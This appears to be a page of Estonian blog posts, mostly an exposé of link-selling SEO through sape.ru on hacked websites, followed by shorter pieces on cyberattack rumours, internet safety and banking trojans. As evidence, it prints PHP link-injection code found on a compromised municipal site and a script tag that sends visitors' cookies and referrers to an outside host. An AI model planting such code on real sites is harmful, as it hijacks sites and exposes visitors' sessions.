Lühike sisuline sünops on järgnev:

• Optim Technology nimeline seltskond pakub väidetavalt oma SEO-laboris väljatöötatud lahendust aitamaks saitidel skoorida Google’is jt otsimootorites
• Tegelikult kasutatakse selleks lingibörse (vallaveebi juhtumi puhul venelaste sape.ru) ehk teenuseid, mis võimaldavad ühel poolel paigutada veebi tekstilinkide müümise koodi ja teisel poolel neisse veebidesse linke osta
• Lingibörsidesse on sisse ehitatud mh pidev monitooring, nt kui Google võtab linke müünud saidi oma indeksist maha peatub automaatselt reklaam/rahavoog jne – ehk kõik mänguosalised on teadlikud, et otsimootorid peavad sellist tegevust lubamatuks ning tegelevad igapäevaselt aktiivse kassi-hiire-mänguga
• Lingibörsi kood satub veebidesse mitmel moel – leidub pisemate saitide omanikke kes kasutavad võimalust raha teenida (mh on suht mõttetu sisuga liiklust suunavate minisaitide pidamine täiesti eraldi tegevusvaldkond SEO-maailmas), on veebimeistreid kes klientide teadmata nende veebe ära kasutavad – ja lisaks on hea äri-idee häkkida massiliselt veebisaitidesse pannes need linke kuvama
• Vaadates Optimi ja nende klientide sape.ru börsilinke paistab, et .ru puhul on tegemist peamiselt linke müüvate veebidega ja mitte-.ru puhul häkitud saitidega – muuhulgas jäi silma, et samal päeval (öösel) saates mainitud vallaveebiga on täpselt sama kood lisatud ka ühte hispaaniakeelsesse veebi ehk tegu on olnud business-as-usual häkkeriga kes tõenäoliselt hankis endale veidike FTP-paroole ja asus nende abil raha teenima (vaadates vallaveebi logisid pakun, et häkker on pärit vene/ukraina suunalt)

Pärast Pealtnägija intervjuud on Optim lisanud oma veebi tööriista mis peaks aitama leida veebilehele peidetud spämm-linke ning deklaratsiooni:

Optim Technology eksperimenteerib aktiivselt rahvusvaheliste tehnoloogiatega, mis hõlmavad ka lingibörside kasutamist. Samas soovime, et linkide müük Eesti Vabariigis toimuks 100% seaduslikel alustel. Pole midagi halba selles, kui koduleht osaleb lingibörsidel lehe omaniku soovil ning teenides omanikule lisatulu. Samuti tuleks sellisel viisil teenitud tulult maksta ka seadustega määratud maksud.

Paraku on Optim kas jätnud lugemata Google’i veebimeistritele mõeldud Quality guidelines’i (ehk nad ei jaga SEO’st ööd ega mütsi, milles ma sügavalt kahtlen) või eksitab tahtlikult oma kliente – sest vägagi selge sõnaga on seal öeldud nii:

Avoid tricks intended to improve search engine rankings. A good rule of thumb is whether you’d feel comfortable explaining what you’ve done to a website that competes with you. Another useful test is to ask, “Does this help my users? Would I do this if search engines didn’t exist?”

Don’t participate in link schemes designed to increase your site’s ranking or PageRank. In particular, avoid links to web spammers or “bad neighborhoods” on the web, as your own ranking may be affected adversely by those links.

Tegemist ei ole muideks mingi uue teemaga, näiteks jääb kiire guugeldamisega näppu Matt Cutts’i postitus aastast 2005 Text links and PageRank - ehk Google tegeleb aktiivselt sellega, et tabada müüdud linke ning vältida nende arvestamist otsitulemuste järjestamisel.

Olgu lisatud, et peidetud linkide avastamisel saab linkiv sait nipsti indeksist kinga – näiteks sattusin ma 2009-suvel mõnede Eesti saitide peale mille sappa oli neid haldav veebimeister lisanud lingid parim-ee kataloogi alamlehtedele. Palusin saidi-omanikul lisada lehele Google Webmasters Tool’i tuvastuskoodi ja sain peagi näha järgmist teadet (kuna veebimeister on vahepeal vahetunud peidan saidi nime):

Ja otseloomulikult pole Google’i poliitikas midagi erakorralist, ka kõik teised otsimootorid näevad vaeva pakkumaks “orgaanilisi” tulemusi … ja kes mõistab venet võib vaadata (arvatavasti autorikaitse eesmärgil suvaliste klipijuppidega pikitud) intervjuud Война между Яндекс и биржой ссылок sape.ru kus viimase tehnikapealik selgitab süsteemi tööd. Muideks – isegi Optimi ärimudel “arve ainult toimiva positsioneerimise eest” ei ole unikaalne vaid lingibörsi-vahenduse vallas pigem tavapärane.

Tänu tegelastele nagu sape.ru ja selliste teenuste pisivahendajatele nagu Optim saavad kasutajad otsitulemusi mis ei vii neid mitte parima kliendireputatsiooniga ettevõtte juurde vaid seltskonda keda ei häiri ebaeetiline turundus kanalites mille peamiseks kasutajaks tunduvad olema saidid stiilis asian-t33n-pr0n-com ja russian-mail-order-brides-co-uk.

Septembri algul teemaga tegeledes jäi silma näiteks selline valik Eesti ettevõtete domeene mis kasutasid sape.ru börsi teenust (samadel saitidel oli ka Optimi enda linke miska tundub, et tegemist on nimelt nende klientide ja mitte omal-käel-üritajatega): aknauksemaailm-ee, sfinksehitus-ee, kodusisu-ee, call-ee, veebiabi-ee, planb-ee, lenovo-ee, ereal-ee, kauponline-ee, uksetehas-ee, gidrocity-ee. Pealtnägija tarbeks tehtud helita kattevideo otsimisest, leidmisest ja peidetud linkidest leiab siit.

Kui leiad siit nimekirjast oma konkurendi (või lihtsalt on veidi aega üle) siis soovitan teha otsing stiilis link:uksetehas.ee ning seejärel astuda läbi Google Webmaster Tools all olevast Report paid links tööriistast (eeldab sisselogimist) ning täita vorm.

Nüüd aga tiba tehnilisemaks – kuidas siis asi käib? Hea ülevaate linkide ostmisest SAPEs annab nende enda õppevideo http://vimeo.com/23869111 ja tõepoolest, tegemist on väga vinge tööriistaga mis muuhulgas võimaldab otsida sobilikke saite lähtuvalt märksõnadest ja pagerank’ist, hallata keerulisi kampaaniad ning kontrollida ostetud linkide toimimist.

Veebimeistri jaoks on olemas õpetused kõigi tuntud sisuhalduslahenduste jaoks – reeglina PHP-kood mis suhtleb SAPE serveriga, hangib sealt värksed lingid ning siis kuvab need veebilehel sobilikus kohas. Kood sokutatakse sisuhalduses mõnda vähekäidavasse nurgatagusesse ja näiteks Lasva valla veebi puhul pöördus selle poole jupike Typo3 index.php sabas:

$sp_script = $_SERVER['DOCUMENT_ROOT'].'/fileadmin/tv-templates/template1/images/401.php';
$style="<style type=\"text/css\">\nhtm, bod {\n\tpadding: 0;\n\tmargin: 0;\n\theight: 100%;\n}\n\n";
$style.="#sp, #sp a {\n\tfont-size: 9px;\n\tcolor: #E8E8E8;\n\tborder-bottom: none;\n\tclear: both;\n}\n</style>\n\n";
while(is_integer(strpos($contents,"<a ")) && is_integer(strpos($contents,"</a>")))
{
$new_contents.=substr($contents,0,strpos($contents,"<a "));
$contents=substr($contents,strpos($contents,"<a "));
$ahref = substr($contents,0,strpos($contents,"</a>")+4);
$contents=substr($contents,strpos($contents,"</a>")+4);
if (!strpos($ahref,"href=\"http://".$_SERVER['HTTP_HOST']) && !strpos($ahref,"href=\"<a href="http://www">http://www</a>.".$_SERVER['HTTP_HOST']) && !strpos($ahref,"href='http://".$_SERVER['HTTP_HOST']) &&
!strpos($ahref,"href='<a href="http://www">http://www</a>.".$_SERVER['HTTP_HOST']) && strpos($ahref,"http"))
{ $ahref=str_replace("<a ","<noindex><a ",$ahref); $ahref=str_replace("</a>","</a></noindex>",$ahref);$ahref=str_replace("<\\/a>","<\\/a></noindex>",$ahref); }
$new_contents.= $ahref;
}
$new_contents.=$contents;
if (strpos($new_contents,"</body>") && strpos($new_contents,"</head>"))
{
$new_contents = str_replace("</head>",$style."</head>",$new_contents);
$new_contents = str_replace("charset=iso-8859-1","charset=utf-8",$new_contents);
$new_contents = str_replace("charset=ISO-8859-1","charset=UTF-8",$new_contents);
echo substr($new_contents,0,strpos($new_contents,"</body>"));
require_once($sp_script);
echo substr($new_contents,strpos($new_contents,"</body>"));
}
else { echo $new_contents; }

Nagu näha lisatakse saidi enda linkidele ühtlasi noindex vältimaks väärtusliku “lehemahla” lahjendamist mitte-börsi linkide poolt. Väga kaunis ja professionaalne :-)

Pealtnägija jaoks tehtud teises kattevideos soovitaks aga eraldi vaadata kohta mis algab ca 1:20 peal – seal on näha konkreetse lingibörsikasutaja kood ning kui seda guugeldada tuleb välja üks hispaaniakeelne sait … mis on juhtumisi saanud endale börsikoodi samal päeval Lasva veebiga ehk 08.11.2010:

Sarnast SAPE-linkide märgendust ehk <div id=’sp’> hakkas silma veel mitmes saidis, enamus neist Dreamhost’i all:

• go.org.nz 69.163.150.4 apache2-udder.brewers.dreamhost.com
• www.lgc.org 69.163.167.250 apache2-emu.reds.dreamhost.com
• datingfoundry.com 69.163.185.120 apache2-linus.yaounde.dreamhost.com
• www.sumaqperu.com 69.163.204.191 apache2-fritz.suva.dreamhost.com
• www.gundaroobushfestival.org.au 69.163.179.108 apache2-prance.vikings.dreamhost.com
• www.bogotabiketours.com  69.163.172.12 apache2-adamant.bulls.dreamhost.com
• escuelasinestres.org 69.163.203.250 apache2-emu.sansalvador.dreamhost.com
• cnuny.org 188.120.245.97 heyhosting.com
• eutcartagena.es 212.36.82.107 fnhca-29.srv.cat

Tiba erinev tehnoloogia ehk teksti sisse pikitud lingid jäid silma saitides:

• forestig.com
• macyscoffee.com
• www.punjabjustice.org

Kohvi-saidist leiab muideks keset ajalooteksti lingi veebiabi-ee peale… ja tellimise lehelt Optimi enda taanikeelse saidi promo:

Päris alati ei pruugi saidi häkkimine aga peidetud tekstilinkidega piirduda – sattusin peale ka sellisele saidile nagu www.campnuhop.org kus lehesabas olev kood nägi välja palju huvitavam:

See pikk liitmistehe annab tulemuseks uue koodjupi:

<script src="http://sbdtds.com/acounter.js?r=&c=&i=bc193015995f14dc4cefc81636413366a&h=campnuhop"></script>

Nagu näha (vaata kasvõi kattevideo liikuvad pilti) käivitatakse kasutaja brauseris javascript mille alla-laadimise käigus teavitatakse serverit muuhulgas kasutusel olevast brauserist… ja see c= parameeter sisaldanuks saidi cookie’t (mis võimaldaks mh tulevikus minuna sisse logida) ning r= refereri (ehk kuidas kasutaja laagri lehele tuli). Vot nii.

Kes oskab ja tahav kaevab (või kaebab) edasi, mina nüüd jälle jupp aega meedias ei esine (see siin oli lihtsalt liiga huvitav juhtum – olen nimelt mõnda aega pisteliselt peidetud linkide teemaga kokku puutunud ning aidanud veebe puhastada / turvaintsidente lahendada; lisaks mainis Mihkel Kärmas mulle teemat kohas mille veebis ma 2009-suvel esimest korda peidetud linkidega kokku puutusin … ning ma lihtsalt ei saanud jälgida oma head tava anda veidi taustainfot ja siis ajakirjanik pikalt saata; jamuideks, guugeldage veidi ja tekib tunne, et ka Optimi taga on PR- ja ajakirjandusteaduskonna lõpetanud :-).

• cybersecurity.ee: 2008-04-07 – Эстония опасается повторения хакерских атак / Kas küberrünnakud tulevad taas?, 2008-04-08 – MayDay: предполагаемое оружие кибервойны-2008 / MayDay: uus relv küberrünaku korraldamiseks?, 2008-04-09 – Новые кибератаки: 50 на 50? / Uute küberrünnakute tõenäosus on 50:50?
• infosecurity.ee (venekeelne Arvutikaitse): 2008-04-08 MayDay: оружие для кибератаки? ja 2008-04-09
• arvutikaitse.ee: 2008-04-08 Kuulujutt: valmistatakse ette kübersõja kordust
• EPLO: 2008-04-09 Andmeturbespetsialist: uute küberrünnakute tõenäosus on 50:50

Kõik need keerlevad Dmitri Kuznetsovi ümber – cybersecurity.ee juures pole autorit mainitud, aga see tundub olema tema projekt, samuti sealt edasi viidatud saidid nagu hermitage.ee (ja mõistagu PIT Consulting kah). Infosecurity.ee peal kajastab teemat Dmitri, Arvutikaitse.ee viitab Dmitrile jne.

Ehk meil on üks tubli infoturbe müügitegelane, kes aktiivselt levitab “kuulujuttu” mis on tõusnud juba 50:50 riskianalüüsiks. Rääkisin Dimaga kes oli ka nii lahke ja viis mind kokku oma hinnangu allikaga – ja ma ei saanud isegi ühtegi vihjet mis viitaks sellele, et kellelgi on kusagil kunagi olnud mingisugunegi seos Mayday ja potentsiaalse rünnaku vahel.

Mul hakkas kohe kergem. Kartsin nimelt, et vahest tegin Dimale liiga kui EPLile tsitaati andes “ärevat mõttelaadi” mainisin – aga ilmneb, et mul oli õigus. Ja peavoolumeediale soovitus, et kui kolmest küsitletust kaks annavad mõistu-vastuseid jõulukuuskedest ja küünaldest, siis võiks teha loo pigem sellest miks see kolmas ekspert oma uudisega nii järsku välja ujus. Uudis saab vingem ja sellest on lugejatele ka reaalset kasu.

Nagu Jaani hilisemast postitusest lugeda võivad kutset mitte saanud ajakirjanikud veel meldida, miska käin siinkohal välja paar asjassepuutuvat ressurssi nii osalejatele kui lihtsalt huvilistele. Kõigepealt päevakava (ainult sisulised kirjed, st ilma kogunemise ja kohvita):

10.05 – 10.20 Ülevaade valdkonnaga tegelevatest osapooltest (Jaak Aab, Riigikogu liige)

10.20 – 11.10 Internetiohutus maailmas (Peter Fifka, Microsoft)

11.10 – 11.35 Olukorrast koolides internetiohutuse valdkonnas, Eesti näide (Hanna Toom, Tallinna Ühisgümnaasium)

11.35 – 12.00 Noppeid õpetajate ja õpilaste projektitöödest (Signe Piirsalu, Tiigrihüppe SA ja Birgy Lorenz, Pelgulinna Gümnaasium)

12.50 – 13.15 Meedia kui alternatiivne teadlikkuse tõstmise kanal õppekava kõrval (Halliki Harro, Tartu Ülikool)

13.15 – 14.45 Diskussioon: Kas kool on valmis internetis valitsevaid ohte õpetama? Kas koolile on teavitustöös alternatiive, millised need on? Näited elust, koolist ja kodust. Vestlusringist võtavad osa poliitikud, hariduseksperdid ja lastekaitsega tegelevad inimesed.

Ma ei tea kas ma diskussioonis osalemiseks kvalifitseerun, aga igastahes käiks välja veidi lugemist mis on mulle viimasel ajal silma hakanud.

• ‘Internet Predator’ Stereotypes Debunked in New Study – American Psychologist‘is ilmunud artikkel võtab ette meedias korduma kippuvad väited ohuvektorite, riskigruppide ja potentsiaalsete kurjategijate profiilide kohta ning paneb sinna kõrvale nende uurimustest tuleneva statistika (2000-2002 baasil, aga neil on käimas 2007-2008 uuring ja väidavad, et olulisi erinevusi pole märgata), minu üle-jala-tõlkes:
  • vaid 5% juhtudest valetab seaduserikkujua ennast teismeliseks
  • ligemale 75% neist kes kohtusid seaduserikkuja näost näkku tegid seda korduvalt
  • enamus netiga seotud seksuaalkuritegudest ei ole vägivaldsed, väga harva esineb jälitamist või röövimist
  • noored kes tegelesid nelja või enama ohtlikuks loetud tegevusega (mh võõrad sõbralistis, seksiteemalised vestlused inimestega keda nad ei tunna ning jõhkrutsemine netis) said keskmisest enam seksuaalset laadi ettepanekuid
  • poisid kes onhomoseksuaalsed või kahtlevad oma orientatsioonis satuvad keskmisest enam internetist alguse saanud seksuaalkuritegude ohvriks
• MacArthur Foundation ja MIT Press on andnud välja seeria artiklikogumikke noorte, digimeedia ja õppimise teemal: The John D. and Catherine T. MacArthur Foundation Series on Digital Media and Learning. Sellelt lingilt saab nii paber-raamatuid osta kui tasuta versiooni alla laadida – ning kuigi need minul endal veel to-read listis kutsuks (Tiigrihüpet? Micorosoft Eestit? Haridusministeeriumi?) üles kaaluma võimalust neid (a) raamatukogudele tellida (b) tõlkida ja levitada. Heaks sissejuhatuseks on John Palfrey blogipostitused (John ja Urs Gasser, kes parasjagu sarnasel teemal raamatut kirjutavad, on juhtumisi minu RSS-i põhilistis… jajah, sellest ajast kui ma neid iLaw’l kuulama sattusin):
  • MacArthur/MIT Press Series on Youth, Media, and Learning
  • Civic Life Online: Learning How Digital Media Can Engage Youth
  • Digital Youth, Innovation, and the Unexpected

• Küber-koolikius ehk cyberbullying on teema millega maailmas päris palju organisatsioone tegeleb, ehk kui termin teada siis edasine infohange ei peaks probleemiks olema. Mina sain sõnast teada tänu UK haridusministeeriumi initsiatiivile.

Jätan endale vabaduse seda postitust täiendada kui peaks meenuma asjassepuutuvaid linke (või kui keegi midagi privas/kommentis soovitab). Ja kui ma peaks suutma lokaliseerida eelmise kevade TÜ bakatööd mis eriti just rate.ee teemat puudutasid siis need kah.

Sest juhul, kui täiesti uut tüüpi viirused ründavad spetsiaalselt Hansapanka ning suudavad kontodelt kasutajatele märkamatult raha kõrvaldada (kodanikel soovitatakse lausa netipanga-seansi lõpus kontojääki kontrollida) muutes maksekorralduse andmeid… siis on uudisekünnis tõega ületatud ja me võime muuhulgas IDkaarti murtuks lugeda.

AGA. Saate lühidaks kokkuvõtteks võib öelda, et tegu on üsna tavaliste troojalastega (õigem oleks vist öelda ‘nende loomise töövahenditega’) mis juba mõni aasta arenduses olnud ja evolutsiooni käigus mõistagi ka vingemaks muutunud. Teadaolevad ründed on kah üsna harilikud, tõsi paroolide kogumisele on lisandunud interaktiivsus ehk midagi sellelaadset mida ma Pealtnägijale demosin (kasutaja sisestab koodi ning samal ajal logib keegi kusagil mujal sellega sisse). PINkalkulaator on rünnatav (Hansa on aga kohe-kohe muutmas selle kasutusloogikat, st küsides PINi ka makse tegemisel), IDkaart täna veel mitte.

Ja lisaks… Komistame me otsa ka avatud/suletud WiFi teemale: Neeme Korv: miks te ukse lahti jätate? ja Bruce Schneier: My Open Wireless Network, räägime bluetooth-kõrvakomplektide ebaturvalisusest… ja iga külaline räägib oma versiooni sellest, mis võiks tegelikult olla nn pangaviiruste (ja küberrünnete) taga.

Netiversioon on 58 minutit ehk pikem kui eetris olnud saade.

Lae alla ja kuula: [ MP3 26.5MB ] [ OGG 55.0MB ]

• saadakse “õnnelik infokild” (keegi näeb välismaise välimusega inimest automaatrelvaga, mis pärast osutub küll paintballi-püssiks aga no mis seal vahet, FBI is on the case)
• kodanike juurde sokutatakse “kriminaalpolitseiga seotud isik” (Time’i loos sageli eks-vang)
• kuna alustatud uurimist ei saa raisku lasta, siis varem või hiljem õnnestub sokutatud isikute kaasabil tekitada olukord, mis kvalifitseerub vähemalt kuriteo kavandamiseks

Loomulikult on võimalik, et tegu oli lihtsalt sita pressibriifingu sita kajastusega mis minus eelkirjeldatud seose tekitas ja tegelikult kriminaalse maailma outsource‘ingus saavadki miski põhjaliku tegevusplaani ja ettemaksuta kutid allhanget tellida…

Aga kui ei olnud tegemis PR-tootmisõnnetusega, siis on kaks noort kodanikku korraldanud näitliku õppetunni sellest, kuidas igasugused imetabased eriõigused ei pruugi päris alati oma Põhiseadusest tulenevat tasakaalustatud eesmärki täita.

ps. ilmneb, et mu utopistlik mõttearendus ei ole eriti originaalne, Merlis tõmbab vist sama rohtu ja jõudis ette, kuniks mina ema sünnipäevatorti pugisin :-)